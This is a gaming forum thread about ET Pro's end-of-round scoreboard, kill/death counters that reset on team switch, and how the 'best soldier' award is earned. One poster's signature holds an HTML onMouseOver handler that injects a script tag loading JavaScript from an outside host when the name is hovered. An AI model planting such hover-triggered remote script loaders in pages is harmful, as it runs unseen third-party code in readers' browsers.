Kills ... Deaths ... scores

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

Medic.Irwin_Wade

Kills ... Deaths ... scores

Post by Medic.Irwin_Wade »

in the end of each game we can see the scores page(when we press More)
any way it gives faulse details like you died 2 times and killed 3 when you died more and killed much more. can you fix it in et pro becuase its would be nice if i could see finally my real scores.
in the left corner of the scores page there is statistics on your weapon use them too dont show the real setings.

i hope you could fix it becuase untill know in all et pro servers i was in it was miscorrect.
I need a Medic!!!
Deus

Post by Deus »

d/k counters are reset when you change team/go spec.
Selfkills count as death.
Medic.Irwin_Wade

wtf ?

so if you wanna keep your score you cant leave your team ? what a shit
I need a Medic!!!
piranha

Post by piranha »

Knew that one already, you are the first one complaining about that :)

Can somebody explain me what the rewards on the scores page at the end of a round are based on because there seems to be bugs at the scores page. Sometimes it shows my name after "best soldier", even if I haven't been soldier for the whole game :?
Mat3k

Post by Mat3k »

I agree on this one, i think you should keep your stats when you switch teams in the middle of a round.

Anyway, piranha, you can still be best soldier without actually playing soldier. The award goes to the person with most heavyweapon XP so if you use the MGs a lot (with any class), you can get the award.
SickBoy

Post by SickBoy »

Could we please stop caring about scores and stats they are in no way related to actual penis size :roll:
Medic.Irwin_Wade

i think there is bugs in the scores page.

but if you play in a game with no soldiers and you killed with mg42 its enough and if you are in a campain with (no matter) 3 maps and you play as soldier in the first map and in the other you didnt but no one eals played soldier so you will keep the award
I need a Medic!!!
pyke

Post by pyke »

Medic.Irwin_Wade wrote:i think there is bugs in the scores page.
nope
Rain

Post by Rain »

piranha wrote:Sometimes it shows my name after "best soldier", even if I haven't been soldier for the whole game :?
"best soldier" really means "best heavy weapons XP." I've received the award for manning the tank MG as a medic.

There is a known problem, though, where the XP initially given with b_defaultskills counts towards awards given at the end of the round.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Badhabit

Post by Badhabit »

SickBoy wrote:Could we please stop caring about scores and stats they are in no way related to actual penis size :roll:
But, then whats the point of tring to point whore :roll: :lol:
{Zer0}'s House of Torment 67.19.67.118:27960
{Zer0}'s RTCW server 67.19.67.119:27960
Now Lets Go Kick Some ASS
And thats an Order.